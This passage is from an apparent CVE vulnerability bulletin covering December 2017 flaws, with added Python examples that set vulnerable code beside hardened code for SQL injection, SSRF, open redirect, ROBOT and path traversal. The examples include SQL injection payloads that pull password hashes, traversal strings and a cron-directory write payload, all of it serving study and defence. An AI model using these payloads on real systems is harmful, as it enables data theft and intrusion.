FS Quibids Clone 1.0 has SQL Injection via the itechd.php productid parameter.2017-12-13not yet calculatedCVE-2017-17581
MISC
fs -- shutterstock_clone
 
FS Shutterstock Clone 1.0 has SQL Injection via the /Category keywords parameter.2017-12-13not yet calculatedCVE-2017-17583
MISC
fs -- stackoverflow_clone
 
FS Stackoverflow Clone 1.0 has SQL Injection via the /question keywords parameter.2017-12-13not yet calculatedCVE-2017-17590
MISC
fs -- thumbtack_clone
 
FS Thumbtack Clone 1.0 has SQL Injection via the browse-category.php cat parameter or the browse-scategory.php sc parameter.2017-12-13not yet calculatedCVE-2017-17589
MISC
fs -- trademe_clone
 
FS Trademe Clone 1.0 has SQL Injection via the search_item.php search parameter or the general_item_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17577
MISC
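The rows above (Website Auction Marketplace, Basic Job Site Script and the FS clone scripts) all describe the same defect: a request parameter such as id, cat_id or keywords is concatenated into a SQL statement. The following is an added illustration written for this bulletin, not code from any of those products; the table and column names are assumptions, and the data is constructed. It shows both the numeric-id and the quoted-LIKE variant next to the parameterised fix, including a UNION payload that pulls rows from an unrelated table, which is why such rows are rated as full database read/modify access.

```python
import sqlite3

# Constructed sample data standing in for a clone script's database; the
# table and column names are assumptions, not taken from any product above.
ITEMS = [(1, "Public listing", 0), (2, "Hidden listing", 1), (3, "Staff-only listing", 1)]
USERS = [(1, "alice", "hash-of-alice-password"), (2, "bob", "hash-of-bob-password")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)", ITEMS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    conn.commit()
    return conn


def item_details_vulnerable(conn, item_id):
    """The pattern behind 'SQL Injection via the ... id parameter': the request
    value is spliced into the statement text, so SQL in it runs as SQL."""
    sql = "SELECT id, title FROM items WHERE id = " + item_id + " AND hidden = 0"
    return conn.execute(sql).fetchall()


def search_vulnerable(conn, keyword):
    """Same defect for a free-text parameter inside a quoted LIKE pattern."""
    sql = ("SELECT id, title FROM items WHERE title LIKE '%" + keyword
           + "%' AND hidden = 0")
    return conn.execute(sql).fetchall()


def item_details_fixed(conn, item_id):
    """Hardened: enforce the expected type, then bind the value as a parameter
    so the database only ever sees it as data."""
    try:
        ident = int(item_id)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, title FROM items WHERE id = ? AND hidden = 0", (ident,)
    ).fetchall()


def search_fixed(conn, keyword):
    """Hardened: the whole LIKE pattern is bound. '%' and '_' in the keyword
    still act as wildcards (a matching issue, not an injection); escape them
    with an ESCAPE clause if exact matching is required."""
    return conn.execute(
        "SELECT id, title FROM items WHERE title LIKE ? AND hidden = 0",
        ("%" + keyword + "%",),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Attacker-controlled request values (constructed payloads).
    for payload in ("1", "1 OR 1=1 --", "0 UNION SELECT id, pw_hash FROM users --"):
        print("vulnerable id=%r -> %r" % (payload, item_details_vulnerable(db, payload)))
        print("fixed      id=%r -> %r" % (payload, item_details_fixed(db, payload)))
    print("vulnerable search -> %r" % search_vulnerable(db, "x%' OR 1=1 --"))
    print("fixed      search -> %r" % search_fixed(db, "x%' OR 1=1 --"))
```

Note that the hidden-row filter is bypassed by the `1 OR 1=1 --` payload and that the UNION payload returns password hashes from a table the endpoint never meant to touch; the bound version returns nothing for either because the value never reaches the SQL parser.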
geomview -- geomview
 
common/help.c in Geomview 1.9.5 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17530
MISC
gnu_global -- gnu_global
 
gozilla.c in GNU GLOBAL 4.8.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17531
MISC
graphicsmagick -- graphicsmagick
 
ReadRGBImage in coders/rgb.c in GraphicsMagick 1.3.26 has a magick/import.c ImportRGBQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17500
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 
WriteOnePNGImage in coders/png.c in GraphicsMagick 1.3.26 has a heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17501
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 
ReadCMYKImage in coders/cmyk.c in GraphicsMagick 1.3.26 has a magick/import.c ImportCMYKQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17502
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 
ReadGRAYImage in coders/gray.c in GraphicsMagick 1.3.26 has a magick/import.c ImportGrayQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17503
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 
WritePNMImage in coders/pnm.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (bit_stream.c MagickBitStreamMSBWrite heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file.2017-12-10not yet calculatedCVE-2017-17498
CONFIRM
BID
CONFIRM
harbor -- harbor
 
The Ping() function in ui/api/target.go in Harbor through 1.3.0-rc4 has SSRF via the endpoint parameter to /api/targets/ping.2017-12-15not yet calculatedCVE-2017-17697
MISC
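The Harbor row above is a server-side request forgery: the endpoint value handed to /api/targets/ping is fetched by the server itself, so it can be pointed at loopback, link-local metadata services or internal hosts. The check below is an added example for this bulletin, not Harbor's code (Harbor is written in Go; this is a generic Python illustration). Hostnames and DNS answers are constructed so it runs offline; 8.8.8.8 merely stands in for "some public address".

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS answers so the example runs offline; the hostnames are
# assumptions, not Harbor's. 8.8.8.8 stands in for "some public address".
FAKE_DNS = {
    "registry.example.com": ["8.8.8.8"],
    "rebind.example.com": ["8.8.8.8", "127.0.0.1"],   # one public, one loopback answer
    "metadata.internal": ["169.254.169.254"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])


def is_public_address(ip_text):
    """True only for addresses that are not loopback, private, link-local,
    multicast, reserved or unspecified. An IPv4-mapped IPv6 address such as
    ::ffff:127.0.0.1 is judged as the embedded IPv4 address; ipaddress alone
    does not report it as loopback."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_endpoint(url, resolver=fake_resolve):
    """Decide whether a caller-supplied endpoint may be contacted server-side.
    Returns (ok, reason). Every resolved address must be public, so a name
    with even one internal answer is refused."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    try:
        addresses = [str(ipaddress.ip_address(host))]   # literal IP, v4 or v6
    except ValueError:
        addresses = resolver(host)                       # hostname: ask DNS
    if not addresses:
        return False, "host does not resolve"
    for ip in addresses:
        if not is_public_address(ip):
            return False, "resolves to non-public address %s" % ip
    return True, "ok"


if __name__ == "__main__":
    for u in ("https://registry.example.com/v2/", "http://127.0.0.1:8080/",
              "http://[::ffff:127.0.0.1]/", "http://metadata.internal/latest/",
              "http://rebind.example.com/", "file:///etc/passwd"):
        print(u, "->", check_endpoint(u))
```

Two caveats a practitioner would add: the resolve-then-connect sequence is itself a DNS rebinding window, so the HTTP client must connect to the address that was checked (pin it and set the Host header) rather than resolving again; and redirects must be disabled or re-checked per hop, otherwise a public host can 302 the server to 169.254.169.254.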
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5T_conv_struct_opt in H5Tconv.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17507
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is a NULL pointer dereference in the function H5O_pline_decode in the H5Opline.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17505
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5Opline_pline_decode in H5Opline.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17506
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds write vulnerability in the function H5G__ent_decode_vec in H5Gcache.c in libhdf5.a. For example, h5dump would crash or possibly have unspecified other impact when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17509
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is a divide-by-zero vulnerability in the function H5T_set_loc in the H5T.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17508
MISC
huawei -- multiple_products
 
Huawei EC156, EC176, and EC177 USB Modem products with software before UTPS-V200R003B015D02SP07C1014 (23.015.02.07.1014) and before V200R003B015D02SP08C1014 (23.015.02.08.1014) use a weak ACL for the "Mobile Partner" directory, which allows remote attackers to gain SYSTEM privileges by compromising a low privilege account and modifying Mobile Partner.exe.2017-12-11not yet calculatedCVE-2014-8358
CONFIRM
BID
MISC

ibm -- connections_engagement_center

IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005.2017-12-11not yet calculatedCVE-2017-1683
CONFIRM
BID
MISC
ibm -- connections
 
IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954.2017-12-11not yet calculatedCVE-2017-1613
CONFIRM
BID
MISC
ibm -- doors_next_generation
 
IBM DOORS Next Generation (DNG/RRC) 4.07, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130915.2017-12-13not yet calculatedCVE-2017-1546
CONFIRM
BID
MISC
ibm -- financial_transaction_manager_for_multi-platform
 
IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) 3.0.0.0 through 3.0.0.7 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 132926.2017-12-11not yet calculatedCVE-2017-1606
CONFIRM
BID
MISC
ibm -- inotes
 
IBM iNotes is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.2017-12-13not yet calculatedCVE-2017-1421
CONFIRM
BID
SECTRACK
MISC
ibm -- jazz_foundation_products
 
IBM Jazz Foundation Products could disclose sensitive information during a scan that could lead to further attacks against the system. IBM X-Force ID: 129619.2017-12-11not yet calculatedCVE-2017-1507
CONFIRM
MISC
ibm -- maximo_asset_management
 
IBM Maximo Asset Management 7.5 and 7.6 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 131548.2017-12-13not yet calculatedCVE-2017-1558
CONFIRM
MISC
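The Maximo row above is an open redirect: a parameter names the post-login destination and the application forwards to it unchecked. The helper below is an added example for this bulletin, not IBM code; the allowed host name is an assumption. It accepts only site-absolute paths or https URLs on an allow-listed host, and it treats the forms browsers silently rewrite (backslashes, protocol-relative `//`, runs of slashes, embedded tabs and newlines, scheme-only prefixes like `https:evil`) as off-site.

```python
from urllib.parse import urlsplit

# Assumed host for this illustration; a real deployment lists its own origins.
ALLOWED_HOSTS = ("maximo.example.com",)


def safe_redirect_target(target, default="/", allowed_hosts=ALLOWED_HOSTS):
    """Return target if it stays on our own site, otherwise the default path."""
    if not target:
        return default
    # Browsers strip tabs/newlines before parsing, so "/\t/evil" becomes "//evil".
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in target):
        return default
    # Browsers treat backslash as slash in the authority, so "/\evil" is "//evil".
    t = target.replace("\\", "/")
    parts = urlsplit(t)
    if parts.scheme or parts.netloc:
        # Absolute URL: only https to an allow-listed host, with no userinfo.
        if parts.scheme.lower() != "https":
            return default
        if (parts.hostname or "").lower() not in allowed_hosts:
            return default
        if parts.username is not None or parts.password is not None:
            return default
        return t
    # Relative target: protocol-relative ("//host", "////host") is off-site, and
    # anything not starting with "/" is ambiguous, so require a site-absolute path.
    if t.startswith("//") or not t.startswith("/"):
        return default
    return t


if __name__ == "__main__":
    for candidate in ("/apps/start?x=1", "//evil.example/x", "/\\evil.example",
                      "////evil.example", "javascript:alert(1)", "https:evil.example",
                      "https://maximo.example.com/ui", "https://evil.example/ui"):
        print("%-32r -> %r" % (candidate, safe_redirect_target(candidate)))
```

Used in a login handler, the value stored in the session and passed to the redirect response is `safe_redirect_target(request_param)`, never the raw parameter; the default keeps the user on the site when the parameter is rejected rather than failing the login.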
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 could allow an authenticated user to change other users' passwords. IBM X-Force ID: 131290.2017-12-11not yet calculatedCVE-2017-1550
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131289.2017-12-11not yet calculatedCVE-2017-1549
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 131288.2017-12-11not yet calculatedCVE-2017-1548
CONFIRM
BID
MISC
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 133178.2017-12-11not yet calculatedCVE-2017-1632
CONFIRM
BID
MISC
ibm -- support_tools_for_lotus_wcm
 
IBM Support Tools for Lotus WCM (IBM WebSphere Portal 7.0, 8.0, 8.5 and 9.0) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130733.2017-12-11not yet calculatedCVE-2017-1536
CONFIRM
BID
MISC
ibm -- tivoli_monitoring
 
IBM Tivoli Monitoring V6 6.2.2.x could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free error. A remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause the application to crash. IBM X-Force ID: 133243.2017-12-13not yet calculatedCVE-2017-1635
CONFIRM
BID
MISC
ibm -- tivoli_workload_scheduler
 
IBM Tivoli Workload Scheduler 8.6.0, 9.1.0, and 9.2.0 could disclose sensitive information to a local attacker due to improper permission settings. IBM X-Force ID: 134638.2017-12-13not yet calculatedCVE-2017-1716
CONFIRM
BID
MISC
ibm -- websphere_mq
 
IBM WebSphere MQ 7.5, 8.0, and 9.0 could allow a local user to crash the queue manager agent thread and expose some sensitive information. IBM X-Force ID: 126454.2017-12-11not yet calculatedCVE-2017-1760
CONFIRM
MISC
icu -- international_components_for_unicode_for_c/c++
 
The ucnv_UTF8FromUTF8 function in ucnv_u8.cpp in International Components for Unicode (ICU) for C/C++ through 60.1 mishandles ucnv_convertEx calls for UTF-8 to UTF-8 conversion, which allows remote attackers to cause a denial of service (stack-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted string, as demonstrated by ZNC.2017-12-10not yet calculatedCVE-2017-17484
MISC
MISC
MISC
MISC
MISC
MISC
idevicerestore -- idevicerestore
 
The socket_create function in socket.c in idevicerestore through 2017-12-10 allows remote attackers to bypass intended access restrictions and communicate with services on iOS devices by connecting to an IPv4 TCP socket, a similar issue to CVE-2016-5104.2017-12-10not yet calculatedCVE-2017-17496
MISC
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, a large loop vulnerability was found in the function ExtractPostscript in coders/wpg.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted wpg image file that triggers a ReadWPGImage call.2017-12-14not yet calculatedCVE-2017-17682
CONFIRM
imagemagick -- imagemagick
 
ImageMagick before 7.0.7-12 has a coders/png.c Magick_png_read_raw_profile heap-based buffer over-read via a crafted file, related to ReadOneMNGImage.2017-12-10not yet calculatedCVE-2017-17504
CONFIRM
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadXPMImage in coders/xpm.c, which allows attackers to cause a denial of service via a crafted xpm image file.2017-12-14not yet calculatedCVE-2017-17680
CONFIRM
imagemagick -- imagemagick
 
In ImageMagick 7.0.7-12 Q16, an infinite loop vulnerability was found in the function ReadPSDChannelZip in coders/psd.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted psd image file.2017-12-14not yet calculatedCVE-2017-17681
CONFIRM
imagemagick -- imagemagick
 
ImageMagick before 6.9.9-24 and 7.x before 7.0.7-12 has a use-after-free in Magick::Image::read in Magick++/lib/Image.cpp.2017-12-10not yet calculatedCVE-2017-17499
BID
CONFIRM
CONFIRM
CONFIRM
intel -- graphics_driver
 
Type Confusion in Content Protection HECI Service in Intel Graphics Driver allows an unprivileged user to elevate privileges via local access.2017-12-12not yet calculatedCVE-2017-5717
CONFIRM
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025a4 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17700
MISC
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025c8 DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17701
MISC
k7 -- antivirus_15.1.0309
 
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x950025ac DeviceIoControl request.2017-12-15not yet calculatedCVE-2017-17699
MISC
kaspersky -- embedded_systems_security
 
Kernel pool memory corruption in one of the drivers in Kaspersky Embedded Systems Security version 1.2.0.300 leads to local privilege escalation.2017-12-08not yet calculatedCVE-2017-12823
BID
CONFIRM
kildclient -- kildclient
 
KildClient 3.1.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to prefs.c and worldgui.c.2017-12-14not yet calculatedCVE-2017-17511
MISC
kiwi -- kiwi
 
examples/framework/news/news3.py in Kiwi 1.9.22 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17532
MISC
landesk -- management_suite
 
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted Direct Object Reference leads to referencing/updating objects belonging to other users. In other words, a normal user can send requests to a specific URI with the target user's username in an HTTP payload in order to retrieve a key/token and use it to access/update objects belonging to other users. Such objects could be user profiles, tickets, incidents, etc.2017-12-11not yet calculatedCVE-2017-11463
MISC
legion_of_the_bouncy_castle -- bouncycastle_tls
 
BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as "ROBOT."2017-12-12not yet calculatedCVE-2017-13098
CERT-VN
BID
CONFIRM
MISC
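The ROBOT row above describes a Bleichenbacher oracle: the server's differing behaviour on a malformed RSA-encrypted premaster secret lets an attacker submit blinded variants of a captured ciphertext and learn, one query at a time, whether each decrypts to a PKCS#1 v1.5-conforming value. The example below is an added illustration for this bulletin, not BouncyCastle code. It uses a throwaway 512-bit textbook RSA key (far too small for real use, chosen only so it generates in milliseconds) and shows a leaky server next to one applying the RFC 5246 section 7.4.7.1 countermeasure: on any padding, length or version failure, continue the handshake with a random premaster secret so the attacker's probe gets the same answer either way. Timing side channels, which a real implementation must also close, are out of scope here.

```python
import secrets

PREMASTER_LEN = 48
SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47)


def is_probable_prime(n, rounds=32):
    """Miller-Rabin, adequate for a throwaway demo key."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(2 + secrets.randbelow(n - 3), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(candidate):
            return candidate


def make_keypair(bits=512, e=65537):
    """Returns ((n, e), (n, d)). 512 bits is for speed of illustration only."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:            # e is prime, so this is gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))


def modulus_len(n):
    return (n.bit_length() + 7) // 8


def pkcs1_v15_encrypt(pub, msg):
    """EM = 0x00 || 0x02 || PS (non-zero, >= 8 bytes) || 0x00 || msg."""
    n, e = pub
    k = modulus_len(n)
    ps = bytes(1 + secrets.randbelow(255) for _ in range(k - len(msg) - 3))
    em = b"\x00\x02" + ps + b"\x00" + msg
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")


def rsa_decrypt_raw(priv, ct):
    n, d = priv
    return pow(int.from_bytes(ct, "big"), d, n).to_bytes(modulus_len(n), "big")


def pkcs1_v15_unpad(em):
    if em[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    sep = em.find(b"\x00", 2)
    if sep < 10:                           # not found, or PS shorter than 8 bytes
        raise ValueError("bad padding")
    return em[sep + 1:]


def server_leaky(priv, ct, client_version):
    """Distinguishable failures (different alerts/exceptions) are the oracle."""
    pms = pkcs1_v15_unpad(rsa_decrypt_raw(priv, ct))
    if len(pms) != PREMASTER_LEN:
        raise ValueError("bad length")
    if pms[:2] != client_version:
        raise ValueError("bad version")
    return pms


def server_rfc5246(priv, ct, client_version):
    """RFC 5246 7.4.7.1: never signal whether the padding was valid. Any failure
    silently substitutes a random premaster secret and the handshake proceeds
    (and later fails on the Finished MAC, identically for every bad probe)."""
    fallback = secrets.token_bytes(PREMASTER_LEN)
    try:
        pms = pkcs1_v15_unpad(rsa_decrypt_raw(priv, ct))
        ok = len(pms) == PREMASTER_LEN and pms[:2] == client_version
    except ValueError:
        ok = False
    return pms if ok else fallback


def blind(pub, ct, s):
    """Bleichenbacher step: c' = c * s^e mod n decrypts to s * m mod n."""
    n, e = pub
    c = int.from_bytes(ct, "big")
    return (c * pow(s, e, n) % n).to_bytes(modulus_len(n), "big")


def oracle_query(server, priv, ct, client_version):
    """What the attacker observes: did the server reject this ciphertext?"""
    try:
        server(priv, ct, client_version)
        return False
    except ValueError:
        return True
```

Against `server_leaky`, the attacker learns the conformance bit for every blinding factor s and can narrow the interval containing the premaster secret until it is recovered, with no private key needed. Against `server_rfc5246`, every probe returns 48 bytes and the same downstream failure, so the queries carry no information.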
lib/ecstatic.js -- lib/ecstatic.js
 
A regular expression Denial of Service (DoS) vulnerability in the file lib/ecstatic.js of the ecstatic npm package, before version 2.0.0, allows a remote attacker to overload and crash a server by passing a maliciously crafted string.2017-12-14not yet calculatedCVE-2016-10703
MISC
MISC
lilypond -- lilypond
 
lilypond-invoke-editor in LilyPond 2.19.80 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.2017-12-11not yet calculatedCVE-2017-17523
MISC
MISC
MISC
linux -- kernel
 
The usb_destroy_configuration function in drivers/usb/core/config.c in the USB core subsystem in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources, which allows local users to cause a denial of service (out-of-bounds write access) or possibly have unspecified other impact via a crafted USB device.2017-12-12not yet calculatedCVE-2017-17558
MISC
MISC
linux -- kernel
 
The raw_sendmsg() function in net/ipv4/raw.c in the Linux kernel through 4.14.6 has a race condition in inet->hdrincl that leads to uninitialized stack pointer usage; this allows a local user to execute code and gain privileges.2017-12-15not yet calculatedCVE-2017-17712
CONFIRM
CONFIRM
linux -- kernel
 
The Linux kernel 2.6.32 and later is affected by a denial of service: by flooding the diagnostic port 0x80, an exception can be triggered, leading to a kernel panic.2017-12-11not yet calculatedCVE-2017-1000407
MLIST
BID
CONFIRM
MLIST
maplesoft -- maple_t.a.
 
A Reflected XSS Vulnerability affects the forgotten password page of Maplesoft Maple T.A. 2016.0.6 (Customer Hosted) via the emailAddress parameter to passwordreset/PasswordReset.do, aka Open Bug Bounty ID OBB-286688.2017-12-16not yet calculatedCVE-2017-14134
MISC
mathias_kettner -- check_mk
 
A cross site scripting (XSS) vulnerability exists in Check_MK versions 1.2.8x prior to 1.2.8p25 and 1.4.0x prior to 1.4.0p9, allowing an unauthenticated attacker to inject arbitrary HTML or JavaScript via the output_format parameter, and the username parameter of failed HTTP basic authentication attempts, which is returned unencoded in an internal server error page.2017-12-11not yet calculatedCVE-2017-11507
CONFIRM
MISC
mckesson_medical_imaging_company -- conserus_image_repository_archive_solution
 
A security researcher found an XML External Entity (XXE) vulnerability on the Conserus Image Repository archive solution version 2.1.1.105 by McKesson Medical Imaging Company, which is now a Change Healthcare company. An unauthenticated user supplying a modified HTTP SOAP request to the vulnerable service allows for arbitrary file read access to the local file system as well as the transmittal of the application service's account hashed credentials to a remote attacker.2017-12-15not yet calculatedCVE-2017-14101
MISC
mckesson_medical_imaging_company -- conserus_workflow_intelligence_application
 
Security researchers discovered an authentication bypass vulnerability in version 2.0.2 of the Conserus Workflow Intelligence application by McKesson Medical Imaging Company, which is now a Change Healthcare company. The attacker must send a malicious HTTP GET request to exploit the vulnerability. The vulnerability allows an attacker to bypass authentication and escalate privileges of valid users. An unauthenticated attacker can exploit the vulnerability and be granted limited access to other accounts. An authenticated attacker can exploit the vulnerability and be granted access reserved for higher privilege users.2017-12-15not yet calculatedCVE-2017-16776
MISC
meinberg -- lantime_devices
 
Directory traversal vulnerability in the "Upload Groupkey" functionality in the Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with Admin-User access to write to arbitrary files and consequently gain root privileges by uploading a file, as demonstrated by storing a file in the cron.d directory.2017-12-15not yet calculatedCVE-2017-16788
FULLDISC
meinberg -- lantime_devices
 
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with certain privileges to read arbitrary files via (1) the ntpclientcounterlogfile parameter to cgi-bin/mainv2 or (2) vectors involving curl support of the "file" schema in the firmware update functionality.2017-12-15not yet calculatedCVE-2017-16787
FULLDISC
FULLDISC
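The Sterling File Gateway row earlier (dot-dot sequences in a URL reading arbitrary files) and the Meinberg LANTIME rows above (an upload file name steered into cron.d, and a read of arbitrary files) are the read and write faces of the same path confinement failure. The helper below is an added example for this bulletin, not code from either vendor; the directory layout it builds is constructed in a temporary directory so the example runs stand-alone. It decodes the request exactly once, resolves the joined path so that `..` and symlinks are collapsed, and then requires the result to remain under the base directory before any read or write happens.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


def confine(base_dir, requested):
    """Map a client-supplied path onto a location under base_dir. Returns the
    resolved Path, or None if the request would escape through '..', an
    absolute path, a backslash form, or a symlink that lives inside base_dir
    but points outside it."""
    if "\x00" in requested:
        return None
    base = Path(base_dir).resolve()
    # Decode percent-encoding once (as the web server would) and treat the
    # result as relative to the base whatever its leading slashes.
    rel = unquote(requested).replace("\\", "/").lstrip("/")
    candidate = (base / rel).resolve()      # collapses '..' and follows symlinks
    try:
        candidate.relative_to(base)         # ValueError when outside base
    except ValueError:
        return None
    return candidate


def safe_read(base_dir, requested):
    target = confine(base_dir, requested)
    if target is None or not target.is_file():
        return None
    return target.read_bytes()


def safe_write(base_dir, requested, data):
    """The upload case: refuse to create the file anywhere but under base_dir."""
    target = confine(base_dir, requested)
    if target is None or target == Path(base_dir).resolve():
        return False
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)
    return True


def build_fixture():
    """Constructed tree: a docroot, a secret outside it, a fake etc/cron.d
    outside it, and a symlink inside the docroot that points out of it."""
    root = Path(tempfile.mkdtemp()).resolve()
    docroot = root / "www"
    (docroot / "sub").mkdir(parents=True)
    (docroot / "index.html").write_text("hello")
    (root / "secret.txt").write_text("top secret")
    (root / "etc" / "cron.d").mkdir(parents=True)
    os.symlink(root / "secret.txt", docroot / "escape")
    return root, docroot


if __name__ == "__main__":
    root, docroot = build_fixture()
    for req in ("index.html", "../secret.txt", "..%2F..%2Fsecret.txt",
                "sub/../../secret.txt", "..\\secret.txt", "escape"):
        print("%-24r -> %r" % (req, confine(docroot, req)))
    print("write to cron.d:", safe_write(docroot, "../etc/cron.d/evil", b"* * * * * root id"))
```

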